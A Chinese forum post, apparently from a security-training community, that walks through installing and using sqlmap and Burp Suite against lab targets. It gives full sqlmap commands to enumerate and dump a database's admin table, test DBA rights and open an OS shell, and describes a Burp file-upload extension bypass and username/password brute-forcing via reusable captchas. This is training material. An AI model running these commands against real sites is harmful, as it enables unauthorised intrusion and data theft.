sqlmap和burp的常规使用

cc11   ·   发表于 2021-06-01 09:42:33   ·   闲聊灌水区

关于sqlmap和burp的安装及基本使用

纯属菜鸟,只是想要几个币【手动狗头】

首先需要安装软件环境即python和java,安装之后
在命令行里面输入python/java如果没有,百分之99可能是环境变量没有设置!


我们发现cd到python安装目录下执行python就正常了,说明安装好了

环境变量的添加


环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果我定义了这个环境变量的路径。那么在Windows系统的变量中找不到的时候,就会去我添加的路径去寻找对应的东西
=>

=>


=>

sqlmap的使用


  • sqlmap所在文件夹进行cmd

  • 输入python sqlmap.py有这个画面这说明正常使用

  • 常用最基础指令:

-u 指定注入点
—dbs 跑库名
—tables 跑表名
—columns 跑字段名
—dump 枚举数据(很危险,容易出事)
-D 指定库 -T 指定表 -C 指定字段


告诉我存在布尔盲注和时间注入漏洞,但是没跑出联合查询漏洞。
也告诉了我web服务器操作系统,以及sql和apache的版本。
说明工具有局限性,但功能也很强大。


知道了库名找表名=> -D指定库 —tables
python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe —tables


知道了库名表名以后可以找字段名也可以直接列出字段名=>-D 指定库 -T 指定表 —columns 字段

 http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns


可以直接列出所有数据,可指定字段可不 指定=>-D指定库 -T指定表 —dump列出数 据—高危命令
python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin —dump

sqlmap进阶命令

  • 更改user-agent头
    —random-agent 选择随机user-agents头
    有些网站识别到sqlmap头时会禁止
    用法:直接加在命令后面
    python sqlmap.py -u http://59.63.200.79:8003/?id=1 -
    D maoshe —tables —random-agent

  • 延时探测(防止访问过快被ban)
    —delay=1
  • count 查看数据量
    python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin —count

  • level 1-5测试等级 越高检测越详细
    一般用3就可以
    — level 3
    • risk sqlmap语句的复杂度 越高越容易测出
      一般用2就可以
      risk 2
      连起来就是—level 3 —risk 2
    • 测试注入点的数据库权限,如果dba是true可以尝试直接拿websell(网站管理权限)
      —is-dba
      dba即数据库管理员权限
      python sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 —is-dba

  • —os-shell 直接获得目标的cmd权限即调用目标的命令行,用的前提是需要dba是true,但dba是ture不一定可以成功。
    python sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 —os-shell

  • sqlmap跑过的网站会有缓存不会重新跑,数据都是开始的
    —flush-session刷新缓存
    python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe —tables —flush-session

burp的安装

 详细参考
https://bbs.zkaq.cn/t/2178.html

如遇到Burp点run没有反应
在burp文件所在目录打开cmd输入:
javaw -jar burpsuite_pro_v1.7.30.jar



burp的使用

burp的核心是操作数据包
原本:

浏览器 -> 目标网站
目标网站 ->浏览器

burp可以:

浏览器 ->burp -> 目标网站
目标网站 -> burp-> 浏览器


直接让浏览器的数据发到burp


然后在浏览器中直接设置插件的信息,让数据包返回到设置的端口,并把它开起来

  • 测试发现


在burp中将id=1改为id=2,发现网页数据变了,但是传参还是没有变,所以浏览器不知道它的信息被篡改了。


所以burp其中一个核心就是绕过浏览器的一些检测




  • 靶场实战
    http://59.63.200.79:8016/Pass-01/index.php
    先把文件放到网页中,然后开启代理,再开启burp,再点击上传,打开burp修改数据包里的文件名,修改完成后放包,然后关掉代理。
    这个靶场只能上传jpg类的图片文件
    ·1.


·2.
将这个地方改为原本文件的后缀名py


·3.
复制上传上去的路径发现上传成功




  • 关于https
    如果要抓https的数据包必须安装证书
    主要就是防止中间人攻击
    所以需要证书
    访问你在burp中设置得端口,下载证书并导入浏览器信任证书


上传时要选择查看所有文件


上传成功后就可以访问例如用https的百度




  • 单包发送,看返回的数据



  • 可以更改网页传参类型



  • 可以单独抓返回包


然后再点击forward





对当前界面按登录键时进行抓包,并将包放进单包发送里面


显示账号不存在,而且发现这里数据包被拦截之后,验证码可以重复使用,所以这里可以先爆破账户名

将数据包发到跑包里面进行爆破




即发现账户名


遂定好账户进行跑密码


登录成功






burp还具有编码器功能

用户名金币积分时间理由
清河逸尘 0.90 0 2021-06-03 21:09:23 burp让我又明白了
zz风过无痕 5.00 0 2021-06-02 09:09:28 我来代替风哥爱你~~

打赏我,让我更有动力~

1 条回复   |  直到 2021-9-27 | 1693 次浏览

a1287074202
发表于 2021-6-4

学习了

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.